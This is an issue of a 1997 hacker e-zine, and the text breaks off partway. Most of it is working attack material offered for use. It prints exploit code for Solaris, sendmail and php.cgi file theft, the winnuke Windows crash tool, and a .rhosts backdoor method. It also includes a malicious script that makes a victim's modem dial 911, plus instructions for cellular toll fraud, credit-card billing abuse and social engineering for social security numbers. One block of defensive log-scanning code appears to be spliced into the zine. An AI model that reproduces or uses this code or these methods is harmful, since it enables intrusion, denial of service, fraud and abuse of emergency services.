───────────────────────────────────────────────────────────────────────────────
===============================================================================
=--------------------=====================================--------------------=
=--------------------=  Status : Confidence Remains High.  =--------------------=
=--------------------=            Issue : 002.             =--------------------=
=--------------------=        Date : May 26th 1997.        =--------------------=
=--------------------=====================================--------------------=
===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================
───────────────────────────────────────────────────────────────────────────────
                          .:. Site Of The Month .:.
───────────────────────────────────────────────────────────────────────────────
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
───────────────────────────────────────────────────────────────────────────────
                     In This HUUUUUUuuuUUUUUGE Issue :
───────────────────────────────────────────────────────────────────────────────

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High Issue 2....................: Tetsu Khan
2. wh0 the King?......................................: so1o
3. www.codez.com......................................: fr1day

-----=> Section B : Exploits And Code.

1. Unpatched Solaris 2.3 / 2.4 Exploit -=> solsuid.c.: Shawn Instenes
2. Pretty Useful Solaris 2.5.1 Exploit -=> ban251.c..: s0me Bugtraq d00d
3. Scan For php Vulnerable Servers -----=> phpscan.c.: so1o
4. Use php.cgi To Get Files ------------=> phpget.c..: p1
5. Hiding From Who (incase you didn't read the pilots): so1o
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1
7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith
8. Windoze NT / 95 Killer : winnuke.c.................: _eci

-----=> Section C : Phones / Scanning / Radio.

1. Federal Bugging Frequencies........................: Weapon-X
2. 911 Autodialler Script.............................: dk
3. Cellular Calls Without Cloning.....................: TRON

-----=> Section D : Miscellaneous.

1. Getting Your Exploits Onto Systems.................: so1o
2. Fakemailing Techniques.............................: so1o
3. Pascal Credit Card Generator Source................: Lobster Guacamole
4. in.courierd : backdoor on port 530.................: so1o
5. UK Laws On Computer Misuse.........................: Darkfool
6. so1o Gets Busted By CERT...........................: so1o
7. CERT Advisory CA-97.13 : xlock vulnerability.......: BugTraq
8. IRiX WWW Server Bugs...............................: Tetsu Khan
9. Hacking Not-So-Electrical Items....................: Tetsu Khan

-----=> Section E : World News.

1. Amnesty International Hacked.......................: Article from cnet.com
2. //sToRm// Of sIn Rips Port Pro.....................: so1o
3. Digital Darkness Lives.............................: so1o
4. /home/sdr 0wned....................................: so1o
5. Sendmail 8.8.4 Remote Is Out.......................: so1o
6. sIn inf0z Part 2...................................: The CodeZero

------=> Section F : Projects.

1. The [C]odeZero [R]emote [A]ttack [K]it (CRAK.tar)..: so1o

-----=> Section G : The End.

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. Confidence Remains High Issue 002 : Tetsu Khan
───────────────────────────────────────────────────────────────────────────────

We have been very busy over the last 50 days, but we still managed to put
together the CodeZero Remote Attack Kit, which contains some very cutting edge
tools as well as some very optimised code. We have included all the programs
precompiled to run from a Linux 2.0.x box, this way you don't even need a
compiler to build this shit =) The source will be available when we can be
bothered to put it on our page, so enjoy this second *FREE* issue of...

...Confidence Remains High!

T_K

One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the
IRT are cool, and they think I live in Sweden :)

Here's a disclaimer, just in case anyone does get a bit annoyed :

***************************************************************************
** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY **
** USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT    **
** COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS    **
** AND YOUR DOG AND CONFISCATE ALL YOUR SHIT.                            **
***************************************************************************

───────────────────────────────────────────────────────────────────────────────
2. wh0 the King? : so1o
───────────────────────────────────────────────────────────────────────────────

Okay, here's a rundown of the main groups and associations around the scene
on the efnet at this moment in time, as well as some comments and members...

r00t
====

Many say r00t own us, members include :

aleph1
Veggie
tfish

As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc,
Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC
security) as well as A LOT of others who are very well known in the
underground. r00t are definitely the biggest group on the scene, and easily
the most powerful.
el8
===

el8 is another very powerful group, with members that between them make el8
a force to be feared, members include :

prym
bw-
tsal

Overall, a good group, with some very smart people.

The CodeZero
============

We d0nt like to talk about ourselves, boosted up to 7 men now :)

The Secret Mouse Society (sms)
==============================

I don't really know much of this group's true power, but members include...

Calidor
vertex
vortex

They have many shells traders, and therefore probably a lot of influence in
the shells world, as well as experience, quite a large group.

I won't even talk about Undernet groups, seeing they continually split, join
other groups, change names, rip other people's code, shit like that,
basically acting like 12 year old warez kiddies (take sIn for example, or
maybe even Psychosis.)

───────────────────────────────────────────────────────────────────────────────
3. www.codez.com : fr1day
───────────────────────────────────────────────────────────────────────────────

Yah000!!!@# wE gOt A dOmAin!!!@~#

On www.codez.com we will have 40mb of space, this will include the
following..

-=[ The Confidence Remains High Distro Point
-=[ The CodeZero Exploits / Programs And Tools Page
-=[ The Solaris 2.4 / 2.5.x Exploit Collection
-=[ The Solaris Tools Collection
-=[ The Solaris CodeZero Tools Collection
-=[ The Linux 2.0.x Exploit Collection
-=[ The Linux Tools Collection
-=[ The Linux CodeZero Tools Collection
-=[ W1nd0ze And d0S Tools Collection
-=[ Assorted Text Philes Collection
-=[ The CodeZero FTP Site
-=[ H/P/A/V/C E-Zine Archive
-=[ CodeZero Precompiled Linux / Solaris Tools And Exploits Archive

So don't delay! GO THERE TODAY!@#

And if you can, please link your sites to www.codez.com, as we would be very
grateful :) Seeing we are basically giving all this shit to you for PHREE!
phr1day

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes
───────────────────────────────────────────────────────────────────────────────

/*
 * If a tty port that is writeable by the user and owned by root is opened
 * and the I_PUSH "ms" ioctl call made, followed by an lseek, the effective
 * uid of the user is changed to root.
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <stropts.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    int fd;

    if (argc < 2) {
        fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
        exit(1);
    }
    /* The original opened /dev/ttyb regardless of the argument; the tty
       named on the command line is used here, as the usage message says. */
    fd = open(argv[1], O_RDWR);
    if (fd < 0) {
        perror("open");
        exit(1);
    }
    printf("Your current effective uid is %d\n", (int) geteuid());
    ioctl(fd, I_PUSH, "ms");        /* push the "ms" STREAMS module */
    lseek(fd, 0, SEEK_CUR);         /* the lseek that triggers the uid change */
    printf("Your effective uid has been changed to %d\n", (int) geteuid());
    return 0;
}

───────────────────────────────────────────────────────────────────────────────
2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d
───────────────────────────────────────────────────────────────────────────────

/* Written for Solaris 2.5.1 (sunOS 5.5.1) with /bin/eject */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH   364
#define EXTRA        400
#define STACK_OFFSET 400
#define SPARC_NOP    0xa61cc013

u_char sparc_shellcode[] =
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08";

u_long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");    /* SPARC only: return the current stack pointer */
}

int main(int argc, char *argv[])
{
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen((char *) sparc_shellcode), dso = 0;

    if (argc > 1)
        dso = atoi(argv[1]);             /* optional extra stack offset */

    long_p = (u_long *) buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

    /* NOP sled, then the shellcode, then the return address repeated */
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;
    char_p = (u_char *) long_p;
    for (i = 0; i < code_length; i++)
        *char_p++ = sparc_shellcode[i];
    long_p = (u_long *) char_p;
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
           targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
    execl("/bin/eject", "eject", &buf[1], (char *) 0);
    perror("execl failed");
    return 1;
}

───────────────────────────────────────────────────────────────────────────────
3. Scan For php Vulnerable Servers : phpscan.c : so1o
───────────────────────────────────────────────────────────────────────────────

The next two programs, phpscan.c and phpget.c, are fully compiled in the
CodeZero Remote Attack Kit, details about the whole kit in section F, part 2.

These two programs use a hole in the php.cgi code that allows remote users to
read any file on the system that the http daemon has access to.
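As an added, defender-side example (this is not code from the zine or from CodeZero), here is a POSIX sh/awk check that picks php.cgi file-read requests out of httpd access-log lines in Common Log Format; the log lines, addresses and timestamps below are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the zine: spot php.cgi file-read requests in an
# httpd access log. The sample lines below are constructed, not real traffic.
SAMPLE_LOG='10.0.0.5 - - [26/May/1997:03:12:01 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 1203
10.0.0.9 - - [26/May/1997:03:12:07 +0000] "GET /index.html HTTP/1.0" 200 4311
10.0.0.5 - - [26/May/1997:03:12:09 +0000] "GET /cgi-bin/php.cgi?/etc/inetd.conf HTTP/1.0" 200 877
10.0.0.7 - - [26/May/1997:03:13:44 +0000] "GET /cgi-bin/php.cgi/docs/info.phtml HTTP/1.0" 200 2210
10.0.0.5 - - [26/May/1997:03:14:02 +0000] "GET /cgi-bin/php.cgi?../../etc/shadow HTTP/1.0" 404 210'

# flag_php_cgi_reads LOGTEXT
# Prints "client status target" for every php.cgi request whose query string
# is an absolute path or contains a ../ traversal, i.e. the shape that
# phpscan/phpget send. Normal php.cgi use passes the script via PATH_INFO
# and has no such query, so it is not reported.
flag_php_cgi_reads() {
    printf '%s\n' "$1" | awk '
        $7 ~ /\/php\.cgi[?]/ {
            split($7, part, "?")
            target = part[2]
            if (target ~ /^\// || target ~ /\.\.\//)
                print $1, $9, target
        }'
}

# count_by_client LOGTEXT
# One line per client address with its number of flagged requests, most
# active first; one source walking several system files in a row is the
# phpget pattern worth looking at.
count_by_client() {
    flag_php_cgi_reads "$1" |
        awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' |
        sort -k2,2nr
}

count_by_client "$SAMPLE_LOG"
```

A 404 still counts: the request shows intent even when the file is not there, and a run of them from one client is the signal, not any single hit.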
Vulnerable servers I have found include www.2600.com (FreeBSD 2.1), so it
does have some effect. Use phpscan.c to scan from a list of hosts, then
phpget.c to retrieve files from the remote hosts.

Here begins the c0de...

/*
 * phpscan.c : php.cgi vulnerable server scanning program.
 * Basically a modified phf scanner, by Alhambra of The Guild.
 * Modifications to php.cgi by so1o of The CodeZero.
 *
 * Usage: phpscan   (reads one hostname per line from stdin)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int FLAG = 1;

/* SIGALRM handler: marks the connect() as timed out */
void Call(int signo)
{
    FLAG = 0;
}

int main(int argc, char *argv[])
{
    char host[100], hosta[1024], FileBuf[8097];
    int outsocket, X;
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr outgoing;
    char PHPMessage[] = "GET cgi-bin/php.cgi?/etc/passwd\n";

    while (fgets(hosta, 100, stdin)) {
        if (hosta[0] == '\0')
            break;
        hosta[strlen(hosta) - 1] = '\0';        /* strip the newline */
        write(1, hosta, strlen(hosta));
        write(1, "\n", 1);

        outsocket = socket(AF_INET, SOCK_STREAM, 0);
        memset(&serv_addr, 0, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        nametocheck = gethostbyname(hosta);
        if (nametocheck == NULL) {              /* unresolvable host: skip it */
            close(outsocket);
            continue;
        }
        memcpy(&outgoing.s_addr, nametocheck->h_addr_list[0],
               sizeof(outgoing.s_addr));
        strcpy(host, inet_ntoa(outgoing));
        serv_addr.sin_addr.s_addr = inet_addr(host);
        serv_addr.sin_port = htons(80);

        /* give connect() ten seconds before giving up on this host */
        signal(SIGALRM, Call);
        FLAG = 1;
        alarm(10);
        X = connect(outsocket, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
        alarm(0);

        if (FLAG == 1 && X == 0) {
            write(outsocket, PHPMessage, strlen(PHPMessage));
            while ((X = read(outsocket, FileBuf, 8096)) > 0)
                write(1, FileBuf, X);
        }
        close(outsocket);
    }
    return 0;
}

───────────────────────────────────────────────────────────────────────────────
4. Use php To Get Files : phpget.c : p1
───────────────────────────────────────────────────────────────────────────────

Here's the phpget.c, use it wisely...Some useful files to pull include...
/etc/passwd
/etc/hosts
/etc/services
/etc/syslogd.conf
/etc/inetd.conf

/*
 * p1 (peewun@heterosexual.com)
 * This code retrieves a file using php.cgi on a remote system.
 * This program is for educational purposes only. Use it on p1.com.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

FILE *server;
int sock;

void do_connect(char *host, char *toget);

void do_connect(char *host, char *toget)
{
    char inbuf[1024];
    struct sockaddr_in sin;
    struct hostent *hp;

    hp = gethostbyname(host);
    if (hp == NULL) {
        printf("Cannot resolve %s.\n", host);
        exit(1);
    }
    memset(&sin, 0, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(80);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (-1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin))) {
        printf("Made connection to %s.\n\n", host);
    } else {
        printf("Failed to connect to %s.\n\n", host);
        exit(0);
    }
    server = fdopen(sock, "a+");
    fprintf(server, "GET /cgi-bin/php.cgi?%s\n", toget);
    fflush(server);                 /* push the request out before reading */
    printf("Output from php.cgi request:\n\n");
    while (1) {
        if (fgets(inbuf, 1024, server) == NULL)
            break;
        fputs(inbuf, stdout);       /* not printf(inbuf): the reply is untrusted */
    }
}

int main(int argc, char **argv)
{
    printf("\nThis program retrieves files off a remote system using php.cgi.\n");
    printf("Author: p1 - peewun@heterosexual.com\n");
    if (argc < 3) {
        printf("Usage: %s \n", argv[0]);
        printf("   Ex: %s www.p1.com /etc/passwd\n", argv[0]);
    } else {
        do_connect(argv[1], argv[2]);
        exit(1);
    }
    return 0;
}

───────────────────────────────────────────────────────────────────────────────
5. Hiding From Who : so1o
───────────────────────────────────────────────────────────────────────────────

Okay, bog standard easy shit, works on nearly all systems depending on
security arrangements, I advise you always try this method first when trying
to hide. DONT type the % signs !!!@~"!* ThEy ArE PrOmPtZ!!!

Telnet into the system, then type...

% cd
% echo "+ +" >> .rhosts

If this gives an error, like "Cannot create .rhosts" then try...
% cd
% echo "+ +" > .rhosts

Next telnet to the machine's EXACT address, not 127.0.0.1 or localhost, this
way works the most effectively..as it says "last login from..." and you don't
want your ip to be mentioned, or for anyone to get suspicious, so you will
need to cover your tracks.

% telnet machine.host.com

(then log in again, using the same L/P)

now exit completely, using exit twice.

The system is now all set up for you to log in without being seen or logged,
as the + + you echo to the .rhosts file in the user's home directory is
actually used so that you can remotely execute commands on the system using
rsh, or log into the system remotely, using rlogin. Neither operation
requires a password, just a login name, so if the user changes his password,
you will still be able to use this technique. Now we can attempt to log into
the system untraced, for this we need to either run linux, or be in a shell,
follow this one, easy step, replace "login" with your login, and host.com
with the EXACT host you want to get into...

% rsh -l login host.com csh -i

eg...

% rsh -l tetsu microsoft.com csh -i

This then runs csh (c shell) on the remote host (microsoft) in interactive
mode..you should see something like this...

% rsh -l tetsu microsoft.com csh -i
...Thus no control on this tty, blah blah blah
%

Now you are in, type who :

% who
%

w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now
you can proceed to hack the host without having to worry who's watching you.

Note : Systems Administrators often look over their users' directories for
.rhosts files, so be aware of that.

───────────────────────────────────────────────────────────────────────────────
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1
───────────────────────────────────────────────────────────────────────────────

If modeX would have given us his 884 REMOTE exploit with all the offsets,
then we would have published it, but he didn't, so we ain't :( Have the local
version instead...
#!/bin/bash
clear
echo
echo Sendmail 8.8.4 and 8.8.5 local exploit.
echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97.
echo
if [ "$1" = "-rm" ]
then
  echo Removing /var/tmp/dead.letter
  echo
  rm -rf /var/tmp/dead.letter
  echo Attempting to continue with exploit.
  echo
fi
if [ -e /var/tmp/dead.letter ]
then
  echo File exists: /var/tmp/dead.letter
  echo
  echo If you wish to run this exploit, please delete it by running this
  echo exploit with the -rm flag.
  echo
  exit
fi
ln -s /etc/passwd /var/tmp/dead.letter
cat >> unf << _EOF_
helo
mail from: very@bad.address.here
rcpt to: another@bad.bad.address
data
owned::0:0:exploitation:/:/bin/sh
.
_EOF_
cat unf | telnet localhost 25 >> /dev/null
rm -rf unf
echo
echo Please wait for dead.letter to possibly be appended to by sendmail.
echo
sleep 10
if grep exploitation /etc/passwd
then
  echo Successful addition of account 'owned' to /etc/passwd, running 'su.'
  su owned
else
  echo Unsuccessful exploitation of symbolic link bug.
fi

───────────────────────────────────────────────────────────────────────────────
7. Ident Scanner : ident-scan.c : Dave Goldsmith
───────────────────────────────────────────────────────────────────────────────

Very very useful and quick tool, especially if it finds daemons running as
root that shouldn't be...Or even backdoors on high ports.

Usage : ident-scan [low port] [high port]

/*
 * ident-scan [v0.15]
 * This TCP scanner has the additional functionality of retrieving
 * the username that owns the daemon running on the specified port.
 * It does this by attempting to connect to a TCP port, and if it
 * succeeds, it will send out an ident request to identd on the
 * remote host. I believe this to be a flaw in the design of the
 * protocol, and if it is the developers' intent to allow 'reverse'
 * idents, then it should have been stated clearer in the
 * rfc (rfc1413).
 *
 * USES:
 * It can be useful to determine who is running daemons on high ports
 * that can be security risks.
 * It can also be used to search for
 * misconfigurations such as httpd running as root, other daemons
 * running under the wrong uids.
 *
 * COMPILES: Compiles fine under Linux, BSDI and SunOS 4.1.x.
 *
 * Dave Goldsmith
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

enum errlist { BAD_ARGS, BAD_HOST, NO_IDENT, SOCK_ERR };

void usage(enum errlist error)
{
    fprintf(stderr, "ident-scan: ");
    switch (error) {
    case BAD_ARGS:
        fprintf(stderr, "usage: ident-scan hostname [low port] [hi port]\n");
        break;
    case BAD_HOST:
        fprintf(stderr, "error: cant resolve hostname\n");
        break;
    case NO_IDENT:
        fprintf(stderr, "error: ident isnt running on host\n");
        break;
    case SOCK_ERR:
        fprintf(stderr, "error: socket() failed\n");
        break;
    }
    exit(-1);
}

struct hostent *fill_host(char *machine, struct hostent *host)
{
    if ((host = gethostbyname(machine)) == NULL) {
        if ((host = gethostbyaddr(machine, 4, AF_INET)) == NULL)
            return host;
    }
    return host;
}

int main(int argc, char **argv)
{
    struct sockaddr_in forconnect, forport, forident;
    int i, sockfd, identfd, hiport = 9999, loport = 1, curport;
    socklen_t len = sizeof(forport);
    struct servent *service;
    struct hostent *host = NULL;
    char identbuf[15], recieved[85], *uid;

    if ((argc < 2) || (argc > 4))
        usage(BAD_ARGS);
    if (argc > 2)
        loport = atoi(argv[2]);
    if (argc > 3)
        hiport = atoi(argv[3]);
    if ((host = fill_host(argv[1], host)) == NULL)
        usage(BAD_HOST);

    memset(&forconnect, 0, sizeof(forconnect));
    memset(&forident, 0, sizeof(forident));
    forconnect.sin_family = host->h_addrtype;
    memcpy(&forconnect.sin_addr, host->h_addr, host->h_length);
    forident.sin_family = host->h_addrtype;
    memcpy(&forident.sin_addr, host->h_addr, host->h_length);
    forident.sin_port = htons(113);

    /* make sure identd answers at all before scanning */
    if ((identfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        usage(SOCK_ERR);
    if ((connect(identfd, (struct sockaddr *) &forident, sizeof(forident))) != 0)
        usage(NO_IDENT);
    close(identfd);

    for (curport = loport; curport <= hiport; curport++) {
        for (i = 0; i != 85; i++)
            recieved[i] = '\0';
        forconnect.sin_port = htons(curport);
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
            usage(SOCK_ERR);
        if (connect(sockfd, (struct sockaddr *) &forconnect, sizeof(forconnect)) == 0) {
            /* connected: learn our local port, then ask identd who owns the
               server side of this connection (remote port, local port) */
            if (getsockname(sockfd, (struct sockaddr *) &forport, &len) == 0) {
                if ((identfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
                    usage(SOCK_ERR);
                if (connect(identfd, (struct sockaddr *) &forident, sizeof(forident)) == 0) {
                    /* RFC 1413 query is "server-port,client-port" ended by CRLF */
                    sprintf(identbuf, "%u,%u\r\n", htons(forconnect.sin_port),
                            htons(forport.sin_port));
                    write(identfd, identbuf, strlen(identbuf));
                    if (read(identfd, recieved, 80) > 0) {
                        recieved[strcspn(recieved, "\r\n")] = '\0';
                        uid = strrchr(recieved, ' ');
                        service = getservbyport(forconnect.sin_port, "tcp");
                        printf("Port: %3d\tService: %10s\tUserid: %s\n", curport,
                               (service == NULL) ? "(?)" : service->s_name,
                               (uid == NULL) ? "(?)" : uid + 1);
                    }
                }
                close(identfd);
            }
        }
        close(sockfd);
    }
    return 0;
}

───────────────────────────────────────────────────────────────────────────────
8. Windoze NT / 95 Killer : winnuke.c : _eci
───────────────────────────────────────────────────────────────────────────────

/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define dport 139               /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye";              /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port)
{
    struct sockaddr_in blah;
    struct hostent *he;

    bzero((char *) &blah, sizeof(blah));
    blah.sin_family = AF_INET;
    blah.sin_addr.s_addr = inet_addr(server);
    blah.sin_port = htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *) &blah.sin_addr, he->h_length);
    } else {
        if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {
            perror("gethostbyname()");
            return -3;
        }
    }
    if (connect(sock, (struct sockaddr *) &blah, 16) == -1) {
        perror("connect()");
        close(sock);
        return -4;
    }
    printf("Connected to [%s:%d].\n", server, port);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        exit(0);
    }
    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
    }
    if (open_sock(s, argv[1], dport) != 0)
        exit(-1);
    printf("Sending crash... ");
    send(s, str, strlen(str), MSG_OOB);   /* out-of-band data is what triggers the crash */
    usleep(100000);
    printf("Done!\n");
    close(s);
    return 0;
}

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. Federal Bugging Frequencies : Weapon-X
───────────────────────────────────────────────────────────────────────────────

Commonly Used by Federal Agencies for Bugs, Wireless Microphones, and Body
Wires (also 138-220 MHz, and 399-420 MHz, under 25-50 mW).

149.3500, 165.9125, 167.3375, 167.3425, 167.4875, 168.0115, 169.2000,
169.4450, 169.5050, 170.2450, 170.3050, 171.0450, 171.1050, 171.4500,
171.6000, 171.7500, 171.8450, 171.8500, 171.9050, 172.0000, 172.2000,
172.2125, 172.2375, 172.2625, 172.2875, 172.3125, 172.3375, 172.3625,
172.3875, 172.5500, 173.3375

169.445, 169.505, 170.245, 170.305, 171.045, 171.105, 171.845, 171.905

 27.5750  Customs Low Power < 5 watts
 27.5850  Customs Low Power < 5 watts
163.1000  Customs Low Power < 30 watts
418.5750  Customs Low Power < 30 watts
 40.1200  Federal Shared Mobile Locator Transmitters "Bumper Beepers"
 40.1700  Federal Shared Mobile Locator Transmitters "Bumper Beepers"
 40.2200  Federal Shared Mobile Locator Transmitters "Bumper Beepers"
 40.2700  Federal Shared Mobile Locator Transmitters "Bumper Beepers"
164.9125  FBI Surveillance
165.9125  ATF F5 Surveillance
166.2875  ATF
170.4125  ATF
407.8000  Secret Service
406.2750  Secret Service
408.5000  Secret Service
408.9750  Secret Service
172.2000  DOJ/DEA CH.1
171.6000  DOJ/DEA CH.2
418.0500  DEA Low Power
418.0750  DEA Low Power
418.5750  DEA Low Power
418.7500  DEA
418.6750  DEA
418.9000  DEA F2 CINDY (416.325) Surveillance
418.7500  DEA F3 GAIL Surveillance/Strike Force
418.6750  DEA F4 EMILY (416.325) Surveillance
407.8000  CIA, State Department
408.0500  Federal Shared
408.5750  Federal Shared
409.4000  Federal Shared

960-1215 MHz  Spread Spectrum Systems (Wideband)

Generally Recognized Federal Bug/Spy Bands

Primary   - 25-50 MHz, 135-175 MHz, 225-440 MHz, 1710-1950 MHz, 8.3-12.5 GHz
Secondary - 890 MHz-5.50 GHz, 7.0-9.5 GHz, 10-39.6 GHz

Also, Wide Band Frequency Hopping centered on various UHF-TV channels (ie:
510 or 670 MHz with a hopping width of +/- 25 MHz).

Keep in mind that the federal government can use virtually any frequency
between DC and light.

So get scanning now!!

───────────────────────────────────────────────────────────────────────────────
2. 911 Autodialler Script : dk
───────────────────────────────────────────────────────────────────────────────

Okay, scenario... Your Friend g1mpfuck is on his linux system, you have never
really liked him, and he has gone out to someplace for a few hours, to be
back this evening... If you root his system, and run this, his modem will
dial 911 every 10 mins, but as soon as you do run it, it will kill the pppd
and dial the number, so if he's on IRC, then he will quit...

Here it is! Read the instructions in the code first...

#!/bin/sh
# 911-autodial.sh
#
# for use with linux boxes running DIP.
# dials 911 every ten minutes, and if the user is using pppd
# it kills pppd in order to place the call.
# IMPORTANT!!!
# add this line to root's crontab with: crontab -e root
# 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh
# note: this assumes the modem device is: /dev/modem
# if it is otherwise change "port modem" to
# "port cua1" or whatever the modem device is
# although it is usually /dev/modem.
echo " get $local 0.0.0.0" >> /tmp/911.dip
echo " get $remote 0.0.0.0" >> /tmp/911.dip
echo " port modem" >> /tmp/911.dip
echo " speed 38400" >> /tmp/911.dip
echo " reset" >> /tmp/911.dip
echo " send ATQ0V1E1X4\r" >> /tmp/911.dip
echo " wait OK 2" >> /tmp/911.dip
echo " dial 911" >> /tmp/911.dip
ps -aux|grep pppd|grep -v grep >> /tmp/ppp-check
grep "^root" /tmp/ppp-check > /dev/null 2>&1
if [ $? -ne 0 ] ; then
  echo "PPP IS DEAD" > /tmp/ppp-dead
fi
if [ -f /tmp/ppp-dead ]; then
  /sbin/dip /tmp/911
  rm /tmp/ppp-*
  rm /tmp/911.dip
  exit 1
fi
kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}'`
/sbin/dip /tmp/911
rm /tmp/ppp-*
rm /tmp/911.dip
exit 1

───────────────────────────────────────────────────────────────────────────────
3. Cellular Calls Without Cloning : TRON
───────────────────────────────────────────────────────────────────────────────

There are several ways to make free calls with a cellular phone that does not
have service without the hassle of cloning it, or if you have a phone that
can't be cloned or you don't want to buy the expensive equipment required, so
here are a few ways to do it from home with little risk...

1.) American Roaming Network.
-----------------------------

To reach the American Roaming Network (or something like it, depending on
where you are), put your phone on the alternate carrier side so it says roam,
then dial 0 and it should tell you your call is being forwarded. At that
point you should be connected to an automated system, from here you have a
couple of billing options...

To use a credit or calling card, you enter the area code and number you want
to call; for a calling card you then enter the card number and pin, for a
credit card you then enter the card number and expiration date, then the zip
code of the billing address. ARN takes MasterCard, American Express, and most
local and long distance company calling cards. They say they don't take VISA
anymore, but I've gotten them to work on the automated system.
If the number you call is busy or doesn't answer, you can press * and then
either leave a message that the system will deliver, or try another number.
If you want to dial another number you will have to put the zip code again
after the new number.

You can also make collect and 3rd party billed calls by dialing 0 instead of
the number to call when you connect to ARN. You will be sent to an operator,
tell them you would like to place a call. They will then ask how you would
like to bill it. You can set up a local dialup voice mail box and change the
greeting so it sounds like someone's there to accept the charges, the
operator has to read a script, so you have to adjust the timing to get it
just right. ARN will not 3rd party or collect bill to 800 numbers, nor will
they place calls to 800 numbers charged to 3rd party numbers.

2.) Social Engineering.
-----------------------

Another way is to dial 611 and tell the customer support person that you're
having trouble getting through to the area you're trying to call and could
they try to place the call for you. This works about 50% of the time, it
helps to have the name and cell number of someone who has service with that
provider in case they ask for it, they might ask for the social security
number too, so be prepared, dumpster diving at a cell store is the easiest
place to get that info.

3.) Set Up Service With Someone Else's Info.
--------------------------------------------

